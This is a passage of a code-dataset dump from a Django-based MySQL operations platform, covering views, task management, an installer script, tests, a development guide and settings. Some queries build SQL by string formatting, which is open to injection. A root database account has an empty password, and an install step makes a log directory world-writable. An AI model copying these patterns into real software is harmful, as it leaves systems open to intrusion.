render_to_response('server.html',{'server_list':server},context_instance=RequestContext(request))\ndef server_add(request):\n msg=''\n if request.method==\"POST\":\n result,msg=server_manage.ServerManage(request.POST).add_server()\n if result:\n msg='Sucess'\n return render_to_response('server_add.html',{'owner_list':meta_data.owner_list(),'os_list':meta_data.os,'msg':msg,\n 'plant_list':meta_data.plant_list},\n context_instance=RequestContext(request))\ndef server_detail(request):\n if request.method==\"GET\":\n server=server_manage.ServerGet().get_server(request.GET)\n else:\n if request.POST.get(\"type\")==\"mod\":\n server_manage.ServerManage(request.POST).mod_server()\n server=server_manage.ServerGet().get_server(request.POST)\n else:\n server_manage.ServerManage(request.POST).stat_server()\n server=server_manage.ServerGet().get_server(request.POST)\n return render_to_response('server_detail.html',{\"server\":server,'plant_list':meta_data.plant_list,\n 'os_list':meta_data.os,'owner_list':meta_data.owner_list()\n },context_instance=RequestContext(request))\n \n#business\ndef business(request):\n if request.method==\"GET\":\n page_num=request.GET.get('page')\n business_list_all=business_manage.BusinessGet().get_business_list(None, 100)\n if not page_num:\n page_num=1\n page_data=paginator.paginator(business_list_all,page_num)\n business_list=page_data.get('page_data')\n page_range=page_data.get('page_range')\n return render_to_response('business.html',{\"business_list\":business_list,'page_range':page_range},context_instance=RequestContext(request))\n else:\n business=request.POST.get('business')\n if not business:\n business_list=business_manage.BusinessGet().get_business_list(None, 10)\n else:\n business_list=business_manage.BusinessGet().get_business_list([business], 10)\n return render_to_response('business.html',{\"business_list\":business_list},context_instance=RequestContext(request))\ndef business_add(request):\n if request.method==\"GET\":\n return render_to_response('business_add.html',{'owner_list':meta_data.owner_list},context_instance=RequestContext(request))\n else:\n result,msg=business_manage.BusinessManage(request.POST).add_business()\n if result:\n msg='Success'\n return render_to_response('business_add.html',{\"msg\":msg,'owner_list':meta_data.owner_list()},context_instance=RequestContext(request))\ndef business_detail(request):\n if request.method==\"GET\":\n business=business_manage.BusinessGet().get_business(request.GET)\n else:\n if request.POST.get(\"type\")==\"mod\":\n business_manage.BusinessManage(request.POST).mod_business()\n business=business_manage.BusinessGet().get_business(request.POST)\n else:\n business_manage.BusinessManage(request.POST).stat_business()\n business=business_manage.BusinessGet().get_business(request.POST)\n return render_to_response('business_detail.html',{\"business\":business,'owner_list':meta_data.owner_list()},context_instance=RequestContext(request))\n\n#database\ndef database(request):\n page_range=[]\n if request.method==\"GET\":\n page_num=request.GET.get('page')\n database_list_all=database_manage.DatabaseGet().get_database_list(None, 0)\n if not page_num:\n page_num=1\n page_data=paginator.paginator(database_list_all, page_num)\n database_list=page_data.get('page_data')\n page_range=page_data.get('page_range')\n return render_to_response('database.html',{\"database_list\":database_list,'page_range':page_range},context_instance=RequestContext(request))\n else:\n ip=request.POST.get(\"ip\")\n 
database_list=database_manage.DatabaseGet().get_database_list({\"ip\":ip})\n if not ip :\n page_range=paginator.paginator(database_list)['page_range']\n return render_to_response('database.html',{\"database_list\":database_list,'page_range':page_range},context_instance=RequestContext(request))\ndef database_add(request):\n instance_list=instance_manage.InstanceGet().get_instance_list(None,count=0) #.values(\"id\",\"ip\",\"port\")\n if request.method==\"GET\":\n return render_to_response('database_add.html',{\"instance_list\":instance_list,\"business_list\":meta_data.business_list(),\n \"level\":meta_data.level,'owner_list':meta_data.owner_list()},context_instance=RequestContext(request))\n else:\n (result,msg)=database_manage.DatabaseManage(request.POST).add_database()\n return render_to_response('database_add.html',{\"msg\":msg,\"instance_list\":instance_list,\"business_list\":meta_data.business_list,\n \"level\":meta_data.level,'owner_list':meta_data.owner_list},context_instance=RequestContext(request))\ndef database_detail(request):\n if request.method==\"GET\": \n database=database_manage.DatabaseGet().get_database(request.GET)\n else:\n if request.POST.get(\"type\")==\"mod\":\n database_manage.DatabaseManage(request.POST).mod_database()\n database=database_manage.DatabaseGet().get_database(request.POST)\n else:\n database_manage.DatabaseManage(request.POST).stat_database()\n database=database_manage.DatabaseGet().get_database(request.POST)\n return render_to_response('database_detail.html',{\"database\":database,\n \"instance_list\":meta_data.instance_list(),\"business_list\":meta_data.business_list(),\n \"level\":meta_data.level,'owner_list':meta_data.owner_list()},context_instance=RequestContext(request))\n\n#user\ndef user(request):\n if request.method==\"GET\":\n user_list=user_manage.UserGet().get_user_list('')\n return render_to_response('user.html',{\"user_list\":user_list},context_instance=RequestContext(request))\n else:\n user=request.POST.get(\"user\")\n user_list=user_manage.UserGet().get_user_list({\"name\":user})\n return render_to_response('user.html',{\"user_list\":user_list},context_instance=RequestContext(request))\n\ndef user_add(request):\n if request.method==\"GET\":\n user_list=user_manage.UserGet().get_user_list('')\n return render_to_response('user_add.html',{\"user_list\":user_list},context_instance=RequestContext(request))\n else:\n result,msg=user_manage.UserManage(request.POST).user_add()\n return render_to_response('user_add.html',{\"msg\":msg},context_instance=RequestContext(request))\n\n\ndef user_detail(request):\n msg=''\n if request.method==\"POST\":\n user_id=request.POST.get('user_id')\n if request.POST.get(\"type\")=='mod':\n result,msg=user_manage.UserManage(request.POST).user_mod()\n else:\n result,msg=user_manage.UserManage(request.POST).user_stat() \n else:\n user_id=request.GET.get('user_id')\n user=user_manage.UserGet().get_user_by_id(user_id)\n return render_to_response('user_detail.html',{\"user\":user,\"msg\":msg,},context_instance=RequestContext(request))\n\n#vip\ndef vip(request):\n msg=''\n if request.method==\"GET\":\n vip=request.GET.get('vip')\n if vip:\n vip_list=vip_manage.VipGet().get_vip_by_ip(vip)\n else:\n vip_list=meta_data.vip_list()\n else:\n if request.POST.get('action') == 'add': \n result,msg=vip_manage.VipManage(request.POST).add_vip()\n else:\n result,msg=vip_manage.VipManage(request.POST).mod_vip()\n vip_list=meta_data.vip_list() \n return 
render_to_response('vip.html',{\"msg\":msg,'vip_list':vip_list,'plant_list':meta_data.plant_list},context_instance=RequestContext(request))\n\n#backup\n\ndef backup(request):\n if request.method==\"GET\":\n page=request.GET.get('page')\n backup_list_all=Backup().get_newest_backup_list()\n else:\n page=request.POST.get('page')\n ip=request.POST.get('ip')\n backup_list_all=Backup().get_newest_backup_list(ip=ip)\n if not page:\n page=1\n page_data=paginator.paginator(backup_list_all, page)\n page_range=page_data.get('page_range')\n backup_list=page_data.get('page_data')\n today_static=Backup().get_today_statics()\n return render_to_response('backup.html',{\"backup_list_all\":backup_list,\"page_range\":page_range,\"today_static\":today_static},context_instance=RequestContext(request))\n\ndef backup_config(request):\n backup_type=Backup_Config().backup_type\n backup_tool=Backup_Config().backup_tool\n backup_level=Backup_Config().backup_level\n backup_cycle=Backup_Config().backup_cycle\n backup={\"stat\":'ON'}\n if request.method==\"GET\":\n ip=request.GET.get(\"ip\")\n port=request.GET.get(\"port\")\n instance={\"ip\":ip,\"port\":port}\n config_list,msg=Backup().get_config_by_instance(ip,port)\n backup[\"msg\"]=msg\n return render_to_response('backup_config.html',{\"config_list\":config_list,\"instance\":instance,\"backup_tool\":backup_tool,\n \"backup_type\":backup_type,\"backup_level\":backup_level,\"backup_cycle\":backup_cycle,\n \"backup\":backup},context_instance=RequestContext(request))\n else:\n ip=request.POST.get(\"ip\")\n port=request.POST.get(\"port\")\n instance={\"ip\":ip,\"port\":port}\n config_list,msg=Backup().get_config_by_instance(ip,port)\n backup[\"msg\"]=msg\n result=Backup_Config().config_deliver(request.POST)\n return render_to_response('backup_config.html',{\"instance\":instance,\"config_list\":config_list,\"backup_tool\":backup_tool,\n \"backup_type\":backup_type,\"backup_level\":backup_level,\"backup_cycle\":backup_cycle},context_instance=RequestContext(request))\ndef backup_config_list(request):\n if request.method==\"GET\":\n page=request.GET.get('page')\n backup_list_all=Backup().get_config_list()\n else:\n page=request.POST.get('page')\n ip=request.POST.get('ip')\n backup_list_all=Backup().get_config_list(ip=ip)\n if not page:\n page=1\n page_data=paginator.paginator(backup_list_all, page)\n page_range=page_data.get('page_range')\n backup_list=page_data.get('page_data')\n return render_to_response('backup_config_list.html',{\"backup_list_all\":backup_list,\"page_range\":page_range},context_instance=RequestContext(request))\n\ndef document(request):\n if request.method==\"GET\":\n form=UploadFileForm()\n else:\n form=UploadFileForm(request.POST,request.FILES)\n if form.is_valid():\n _new_doc=Document(file=request.FILES['file'])\n _new_doc.save()\n documents=Document.objects.all()\n \n return render_to_response('document.html',{'form':form ,'documents':documents},context_instance=RequestContext(request))\n\ndef task(request):\n if request.method==\"GET\":\n page=request.GET.get('page')\n task_list=Task().get_task_list(-1)\n if not page:\n page=1\n page_data=paginator.paginator(task_list, page)\n page_range=page_data.get('page_range')\n task_list=page_data.get('page_data')\n return render_to_response('task.html',{\"task_list\":task_list,\"page_range\":page_range},context_instance=RequestContext(request))\n\ndef task_add(request):\n msg=''\n if request.method == \"POST\" :\n result,msg=TaskManage(request.POST).task_add()\n return 
render_to_response('task_add.html',{'owner_list':meta_data.owner_list(),'msg':msg},context_instance=RequestContext(request))\n\ndef task_detail(request):\n msg=''\n if request.method=='GET':\n task=TaskManage(request.GET).get_task_by_id()\n else:\n _task=TaskManage(request.POST)\n result,msg=_task.task_mod()\n task=_task.get_task_by_id()\n return render_to_response('task_detail.html',{'task':task,'owner_list':meta_data.owner_list(),'msg':msg},context_instance=RequestContext(request))\n\n#slow log\ndef slowlog_config(request):\n if request.method=='GET':\n result=instance_manage.InstanceManage(request.GET).stat_instance_slowlog()\n return render_to_response('slowlog_config.html',{'instance_list':meta_data.instance_list()},context_instance=RequestContext(request))\n\ndef slowlog_report(request):\n if request.method=='GET':\n begin=end=None\n else:\n begin=request.POST.get('begin_date')\n end=request.POST.get('end_date')\n groupbyinstance=slowlog.get_chart_groupbyinstance(begin,end)\n total=slowlog.get_chart_total(None,begin,end)\n groupbytime=slowlog.get_chart_groupbytime(begin,end)\n topsql=slowlog.get_chart_topsql(begin,end)\n return render_to_response('slowlog_report.html',{'groupbyinstance':groupbyinstance,'total':total,'topsql':topsql,'groupbytime':groupbytime},\n context_instance=RequestContext(request))\n\ndef slowlog_sql(request):\n msg=''\n if request.method=='GET':\n hash_code=request.GET.get('hash_code')\n else:\n hash_code=request.POST.get('hash_code')\n msg=slowlog.add_opt_record(request.POST)\n groupbyinstance=slowlog.get_sql_hosts(hash_code)\n total=slowlog.get_sql_time(hash_code)\n sql_info=slowlog.get_sql_info(hash_code)\n opt_record=slowlog.get_opt_record(hash_code)\n return render_to_response('slowlog_report_sql.html',{'groupbyinstance':groupbyinstance,'total':total,'sql_info':sql_info,'msg':msg,\"opt_record\":opt_record},\n context_instance=RequestContext(request))\n\ndef slowlog_instance(request):\n if request.method=='GET':\n begin=end=None\n instance_id=request.GET.get('instance_id',1)\n else:\n begin=request.POST.get('begin_date')\n end=request.POST.get('end_date')\n instance_id=request.POST.get('instance_id',1)\n \n #total=slowlog.get_chart_total(instance_id,begin,end)\n total=slowlog.get_chart_total(instance_id)\n instance=instance_manage.InstanceGet().get_instance_by_id(instance_id)\n groupbydb=slowlog.get_chart_groupbydb(instance_id,begin,end)\n topsql=slowlog.get_instance_topsql(instance_id,begin,end)\n return render_to_response('slowlog_report_instance.html',{'instance_list':meta_data.instance_list(),'total':total,'instance':instance,'groupbydb':groupbydb,'topsql':topsql},\n context_instance=RequestContext(request))\n@login_required \ndef failover(request):\n msg=''\n if request.method=='GET':\n ip=request.GET.get('ip')\n failover_list=FailoverGet().get_failover_list(ip=ip)\n\n if request.method=='POST':\n action=request.POST.get('action')\n if action=='add':\n result,msg=FailoverManage(request.POST).add_failover()\n else:\n result,msg=FailoverManage(request.POST).mod_failover()\n failover_list=FailoverGet().get_failover_list()\n wvips=meta_data.vip_list(type=1)\n rvips=meta_data.vip_list(type=2)\n managers=meta_data.server_list(('type',2))\n masters=meta_data.instance_list({'i.role':1})\n return render_to_response('failover.html',{'msg':msg,'wvips':wvips,'rvips':rvips,'managers':managers,'masters':masters,'failover_list':failover_list},context_instance=RequestContext(request))\n\ndef switch(request): \n failover=request.GET\n slaves=[]\n if 
failover.get('method'):\n result=FailoverManage(failover).change_master(failover.get('id'),failover.get('slave'),failover.get('method'))\n #return HttpResponse('123')\n return HttpResponse(result)\n else:\n masterid=failover.get('masterid')\n slaves=instance_manage.InstanceGet().get_instance_slaves(masterid)\n return render_to_response('switch.html',{'failover':failover,'slaves':slaves,'methods':meta_data.failover_method})\n\n@login_required \ndef switch_detail(request):\n '''\n only recieve get request\n '''\n if request.method=='POST':\n return render_to_response('switch_detail.html')\n #failover\n failoverid=request.GET.get('failoverid')\n new_masterid=request.GET.get('new_master')\n method=request.GET.get('method','') \n new_master=instance_manage.InstanceGet().get_instance_by_id(new_masterid)\n failover=FailoverGet().get_failover_by_id(failoverid)\n if failover:\n failover['method']=method\n failover['new_master']=new_master.get('ip')+':'+str(new_master.get('port'))\n #history\n failover_his=FailoverGet().get_failover_history(failoverid)\n #log\n record_id=FailoverGet().get_newest_record(failoverid)\n failover_log=FailoverGet().get_failover_history_detail(record_id)\n result=FailoverGet().get_failover_result(record_id)\n failover['result']=result.get('result')\n return render_to_response('switch_detail.html',{'failover':failover,'failover_his':failover_his,'failover_log':failover_log})\n return render_to_response('switch_detail.html')\n\n@login_required \ndef baseinfo(request):\n return render_to_response('baseinfo.html')\n\n@login_required \ndef baseinfo_instance(reqeust):\n return render_to_response('baseinfo_instance.html')\n\n@login_required \ndef status(request): \n return render_to_response('status.html')\n\n@login_required \ndef report(request): \n return render_to_response('report.html')\n\ndef my_404_view(request):\n response = render_to_response('404.html',context_instance=RequestContext(request))\n response.status_code = 404\n return response\n \ndef my_500_view(request):\n return render_to_response('500.html')\n\n" }, { "alpha_fraction": 0.5333333611488342, "alphanum_fraction": 0.5904762148857117, "avg_line_length": 12.125, "blob_id": "b4fb09f0e24238eda366a6812bc8598f18c29174", "content_id": "bec9e0a689a55c068cdb579e4582f6cff1183882", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 105, "license_type": "no_license", "max_line_length": 32, "num_lines": 8, "path": "/src/mega_web/charts/__init__.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 4, 2014\n\n@author: xchliu\n\n@module:mega_web.charts.__init__\n'''\n" }, { "alpha_fraction": 0.5075594186782837, "alphanum_fraction": 0.5269978642463684, "avg_line_length": 14.466666221618652, "blob_id": "a99cebfc73e94c3addc42b1dafe18763b64524d4", "content_id": "5eb26d38cb890b9cff6f81224899e6d34ef2acf8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 463, "license_type": "no_license", "max_line_length": 32, "num_lines": 30, "path": "/src/mega_service/monitor.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Sep 24, 2014\n\n@author: xchliu\n\n@module:mega_service.monitor\n'''\nfrom lib.logs import Logger\n\nMODEL='Monitor'\nlog=Logger(MODEL).log()\n\nclass Monitor():\n def __init__(self,queue):\n self.q=queue\n def bussiness_monitor(self):\n '''\n 1.backup\n 2.slowlog\n '''\n \n pass\n def 
sys_monitor(self):\n pass\n\ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.4735729396343231, "alphanum_fraction": 0.48343902826309204, "avg_line_length": 26.66666603088379, "blob_id": "22bb7f36cf2b7e5ffaa3e0e74c6a603ecb61aa6b", "content_id": "797f113a047b22b63693919fce9c96637c658418", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1419, "license_type": "no_license", "max_line_length": 132, "num_lines": 51, "path": "/src/mega_web/charts/chart.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "'''\nCreated on Aug 19, 2014\n\n@author: xchliu\n'''\n\nclass Chart(object):\n '''\n classdocs\n '''\n\n def __init__(self):\n '''\n Constructor\n '''\n self.slowlog={'xaxis':[],'data':[]}\n self.yaxis_name=''\n self.data_list=[]\n self.type='line'\n self.title=''\n\n \n def generate(self,data,title=None,*kwgs,**args):\n '''\n data: a list of data [(1,2,3),(2,2,3)]\n \n '''\n if title:\n self.title=title\n self.slowlog['title']=title\n if self.yaxis_name:\n self.slowlog['yaxis_name']=self.yaxis_name\n self.slowlog['type']=self.type\n for line in self.data_list:\n self.slowlog['data'].append({line:[]})\n for d in data:\n self.slowlog['xaxis'].append(str(d[0]))\n for i in range(len(self.data_list)):\n self.slowlog['data'][i][self.data_list[i]].append(int(d[i+1]))\n self.slowlog['xaxis']=[x for x in self.slowlog['xaxis']]\n return self.slowlog\n \n def js_pack(self):\n data='''{chart: {type: %s},\n title: {text: %s},\n xAxis: {categories: %s},\n yAxis: {title: {text:%s}},\n series: %s\n }\n ''' %(self.type,self.title,[x for x in self.slowlog['xaxis']],self.slowlog['yaxis_name'],[ x for x in self.slowlog['data']])\n return data\n " }, { "alpha_fraction": 0.6838340759277344, "alphanum_fraction": 0.7010014057159424, "avg_line_length": 19.558822631835938, "blob_id": "0599416135c2aa2501569f9e3b784701fd265254", "content_id": "d5d4026a0a7c52fdabbd4bb70dfc2a82219ef89a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 699, "license_type": "no_license", "max_line_length": 63, "num_lines": 34, "path": "/src/mega_client/install.sh", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n#Created on Jul 31, 2014\n\n#@author: xchliu\n\n#@module:mega_client.mega_client.install\n\nPROJECT=\"mega_client\"\nif [[ `id -u` -ne 0 ]];then\n\techo 'Need root!'\n\texit 1\nfi\n\np_path=`dirname $0`\nl_path=`pwd`\n\nmkdir -p /var/log/mega/ \nchmod -R 777 /var/log/mega/\n\ncd $p_path\necho \"install python package...\"\necho build >>record.info\ncat record.info| xargs rm -rf\n\npython setup.py build\npython setup.py install --record record.info\nchmod a+x $l_path/mega_client/mega_client.py\nln -sf $l_path/mega_client/mega_client.py /etc/init.d/$PROJECT\necho \"add to rc.local\"\necho \"python /etc/init.d/$PROJECT restart\" >>/etc/rc.local\necho \"start service...\" \npython /etc/init.d/$PROJECT restart\necho \"done\"\n" }, { "alpha_fraction": 0.5689072608947754, "alphanum_fraction": 0.5745400190353394, "avg_line_length": 27.645160675048828, "blob_id": "73ae7dd94b4df84172e55884cbb74c053ac0ebeb", "content_id": "1e5d38964e7294920352f55a17fb01116d0c0f66", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2663, "license_type": "no_license", "max_line_length": 69, "num_lines": 93, "path": "/src/mega_web/console/task.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": 
"# -*- coding:utf-8 -*-\n'''\nCreated on Aug 4, 2014\n\n@author: xchliu\n\n@module:mega_web.console.task\n'''\n\nimport datetime\nfrom mega_web.entity.models import Task\nfrom mega_web.entity.models import User\n\nDEFAULT_TASK_CYCLE=120\n\n\nclass TaskManage():\n def __init__(self,task):\n self.task=task\n self.t=Task()\n self.task_id=self.task.get('id')\n self.task_name=self.task.get('task_name')\n self.task_type=self.task.get('task_type')\n self.task_value=self.task.get('task_value')\n self.task_script=self.task.get('task_script')\n self.task_cycle=self.task.get('task_cycle')\n self.task_target=self.task.get('task_target')\n self.task_owner=self.task.get('task_owner')\n self.task_stat=self.task.get('task_stat')\n \n def task_add(self):\n if not self.task_value and not self.task_script:\n return -1,'Value or script should be provided'\n if self.task_name:\n self.t.name=self.task_name\n else:\n self.t.name=self.task_value\n self.t.type=self.task_type\n self.t.value=self.task_value\n self.t.script=self.task_script\n if self.task_cycle:\n self.t.cycle=self.task_cycle\n else:\n self.t.cycle=DEFAULT_TASK_CYCLE\n \n self.t.target=self.task_target\n self.t.owner=self.task_owner\n self.t.stat=self.task_stat\n _now=datetime.datetime.now()\n self.t.last_time=_now\n self.t.create_time=_now\n self.t.save()\n \n return 1,'Success'\n \n def task_mod(self):\n if not self.task_id:\n return False\n _task=Task.objects.get(id=self.task_id)\n if not self.task_value and not self.task_script:\n return -1,'Value or script should be provided'\n if self.task_name:\n _task.name=self.task_name\n else:\n _task.name=self.task_value\n _task.type=self.task_type\n _task.value=self.task_value\n _task.script=self.task_script\n if self.task_cycle:\n _task.cycle=self.task_cycle\n else:\n _task.cycle=DEFAULT_TASK_CYCLE\n \n _task.target=self.task_target\n _task.owner=self.task_owner\n _task.stat=self.task_stat\n _task.save()\n return 1,'success'\n\n \n def get_task_by_id(self):\n task=Task.objects.filter(id=self.task_id).values()\n if task:\n task=task[0]\n owner=User.objects.filter(id=task['owner']).values('name')[0]\n task['owner_name']=owner['name']\n return task\n \n \ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.5181818008422852, "alphanum_fraction": 0.5909090638160706, "avg_line_length": 11.333333015441895, "blob_id": "f62e49e9a521dbd34a0be2c84ac4b6dbe1da5274", "content_id": "b17ebce36640084c99fabd47cc2eb213537491cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 110, "license_type": "no_license", "max_line_length": 24, "num_lines": 9, "path": "/src/release/__init__.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 2, 2014\n\n@author: xchliu\n\n@module:release.__init__\n'''\nversion='1.0'" }, { "alpha_fraction": 0.5220385789871216, "alphanum_fraction": 0.6322314143180847, "avg_line_length": 37.157894134521484, "blob_id": "c4aa67736475e076e9f2e66d990ef0a9feacc1bc", "content_id": "bec8dcf1a598a6b0f873e642c007596962c46b24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 726, "license_type": "no_license", "max_line_length": 88, "num_lines": 19, "path": "/src/tests/console_failover.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "import time\nfrom mega_client import sender\nfrom mega_client.setting import MEGA_HOST\nformat='%Y-%m-%d %X'\nnow=time.strftime(format, 
time.localtime())\n\n\ncmd={\"update_ha_info\":\"'1.1.1.112:23','1.1.1.111:3306'\",\n #\"add_failover_record\":\"10,'ONLINE','1.1.1.112:23','1.1.1.111:3306'\",\n \"add_failover_record\":\"None,'ONLINE','1.1.1.112:23','1.1.1.111:3306','jjjj'\",\n \"stat_failover_record\":\"32,'Y'\",\n \"add_failover_record_detail\":\"31,'mega','%s','10','y','test the api'\" % now,\n }\n#record_id,module,re_time,time_used,result,content\nfor _cmd,f in cmd.iteritems():\n c=sender.MegaClient(host=MEGA_HOST,cmd=_cmd)\n r=c.run(func_args=f)\n c.close() \n print \"test %s %s: %s\" %(_cmd,f,r)\n\n" }, { "alpha_fraction": 0.5135501623153687, "alphanum_fraction": 0.5189701914787292, "avg_line_length": 27.423076629638672, "blob_id": "7827b84818f06d16fab5dee230258f938cfab220", "content_id": "869116e2031eea56ba71951e03e2315e92232a2e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 738, "license_type": "no_license", "max_line_length": 66, "num_lines": 26, "path": "/src/mega_service/task.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "from lib.PyMysql import PyMySQL\n\n\nclass Task():\n def __init__(self):\n self.q=PyMySQL()\n def stat_task_by_id(self,id,stat_time=0):\n if stat_time == 0:\n sql=\"update task set last_time=now() where id=%s\" % id\n if self.q.execute(sql):\n return True\n return False\n \n def get_task_by_name(self,name):\n if name:\n sql=\"select script from task where name='%s'\" % name\n return self.q.fetchOne(sql)\n else:\n return False\n \n def get_task_list(self,stat=1):\n if stat == -1 :\n sql=\"select * from task\"\n else:\n sql=\"select * from task where stat=%s\" % stat\n return self.q.fetchAll(sql)" }, { "alpha_fraction": 0.604667603969574, "alphanum_fraction": 0.6117397546768188, "avg_line_length": 19.794116973876953, "blob_id": "75d32d6fdd19a0b85a8202b55813fe7fcedc1102", "content_id": "d6e685e9141db509cd5362fef64080ac602e3cf3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3346, "license_type": "no_license", "max_line_length": 129, "num_lines": 136, "path": "/docs/develop.md", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "#开发规范\n\n##目录说明\n\t\n\tmega/\n\t\t* api 公用调用接口\n\t\t* conf 配置文件\n\t\t* docs \t\t 各类文档\n\t\t* lib \t\t 公用库\n\t\t* log \t\t 日志\n\t\t* mega_server 服务后台\n\t\t* mega_web web 项目\n\t\t* release 发布日志\n\t\t* scripts 脚本\n\t\t* tests\t\t 测试用例\n\n## 依赖包\n\npython 2.6/2.7\n\nDjango-1.6.5\n\npip install django_chartit\n\npython-daemon 1.5.5 <a>https://pypi.python.org/pypi/python-daemon/1.5.5]</a>\n\n##代码规范\n\n[google python stype](https://github.com/xchliu/zh-google-styleguide/blob/master/google-python-styleguide/python_style_rules.rst)\n\n###字符集:utf8\t# -*- coding: UTF-8 -*-\n\n\n###定义\n\n* 类命规则:单词首字母大写,无连接符,空2行,必须有`__init__`函数 class Daemon()\n* 函数规则:小写,下划线连接,空1行,必须有`__doc__` def mega_daemon(**argv)\n* 内部函数:同函数,以下划线开头\t\tdef _run(self)\n\n\n###函数:\n\n* 显示定义参数格式及默认值\n* 返回值必须为有效性,不能直接return,或return None\n\n \n##api\n\n\n##lib\n* logs 日志统一模块\n\t\n\t\tMODEL='Listener'\n\t\tlog = Logger(MODEL).log()\n* PyMysql 连接MySQL通用库\n* utils 常用小工具\n* sendmail 邮件发送统一接口\n\n\n###DB\n数据库访问方式:\n\n1. 使用models类 见mega_web/models/*\n\n2. 
使用MySQLdb 见lib/PyMysql\n\n\n##mega_web\nmega 主页\n\n管理 资源管理\n\n调度 任务调度管理\n\n\t\t\n\turl(r'^$',home),\n url(r'^resource/$',resource),\n url(r'^portal/$',portal),\n url(r'^monitor/$',monitor),\n url(r'console/$',console),\n url(r'charts/$',charts),\n url(r'^fun/$',fun),\n\n\t#sub url\n url(r'^resource/instance/$',instance),\n url(r'^resource/instance_add/$',instance_add),\n url(r'^resource/instance_detail/$',instance_detail),\n \n url(r'^resource/server/$',server),\n url(r'^resource/server_add/$',server_add),\n url(r'^resource/server_detail/$',server_detail),\n\n url(r'^resource/business/$',business),\n url(r'^resource/business_add/$',business_add),\n url(r'^resource/business_detail/$',business_detail),\n\n url(r'^resource/database/$',database),\n url(r'^resource/database_add/$',database_add),\n url(r'^resource/database_detail/$',database_detail),\n \n url(r'^resource/user/$',user),\n url(r'^resource/user_add/$',user_add),\n url(r'^resource/user_detail/$',user_detail),\n \n \n url(r'^console/backup/$',backup),\n url(r'^console/backup/backup_config/$',backup_config),\n url(r'^console/backup/backup_config_list/$',backup_config_list),\n\n\t\t\n##mega_service\nTCP 通信数据包规范:\n\n \"\"\" work instance:{'HEAD':'MEGA','TYPE':'CMD','VALUE':'ls'}\n keys:\n HEAD: for safe interactive,should be MEGA\n TYPE: cmd,task,other\n VALUE: what to do : ls\n TIME: when to do : 0 once ,\n REPEAT: lifecycle of job day,week,month\n TARGET: uniqeu identify for server or instance or database.\n \"\"\"\n\n\n##scripts\n* init_db.sql 初始化项目db脚本\n* install.sh 部署脚本\n* mega_salt.py salt接口脚本\n* mega_service.sh mega服务脚本\n\n##tests\n路径:tests/*\n####api\n* api_resource.py 资源池管理接口测试用例\n* slow_log.py slow log添加接口\n* update_backupinfo.py 备份过程中的信息更新接口\n" }, { "alpha_fraction": 0.6102661490440369, "alphanum_fraction": 0.6368821263313293, "avg_line_length": 22.954545974731445, "blob_id": "2e8647908f6665ed95def0a4d2b68247e55182f5", "content_id": "d638fd52a251fcaf19136e2c7016e74280c5212f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 554, "license_type": "no_license", "max_line_length": 60, "num_lines": 22, "path": "/src/conf/settings.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n\nSERVICE_NAME='mega'\nTRACKER_LIFCYCLE=10\nDAEMON_PID='/var/run/%s.pid' % SERVICE_NAME\nDAEMON_LOG='/var/log/%s.log' % SERVICE_NAME\nLOG_FILE_NAME=DAEMON_LOG\n\n\nclass DbConfig():\n def __init__(self):\n pass\n db_host='127.0.0.1'\n db_port=3306\n db_user='root'\n db_pwd=''\n db_db='mega'\n db_charset='utf8'\n\nMEGA_SERVER=\"mega-server.d.chinabank.com.cn\" #mega 后台服务\nEMAIL_SERVER=\"mega-email.d.chinabank.com.cn\" # mega 邮件服务器\nSMS_SERVER=\"mega-sms.d.chinabank.com.cn\" #mega 短信服务器" }, { "alpha_fraction": 0.549346387386322, "alphanum_fraction": 0.556209146976471, "avg_line_length": 31.221052169799805, "blob_id": "cb3805a00c3d5684167d80fd8ec1b1b94174337e", "content_id": "6e1d282b4163363f512da7782ef66fedb606131d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3060, "license_type": "no_license", "max_line_length": 153, "num_lines": 95, "path": "/src/mega_web/resource/user_manage.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jun 26, 2014\n\n@author: xchliu\n\n@module:mega_web.resource.user_manage\n'''\nfrom mega_web.entity.models import Users\nfrom conf.GlobalConf import DEFAULT_PWD,MSG_ERR_NAME,STAT_ONLINE\n\nclass UserManage():\n 
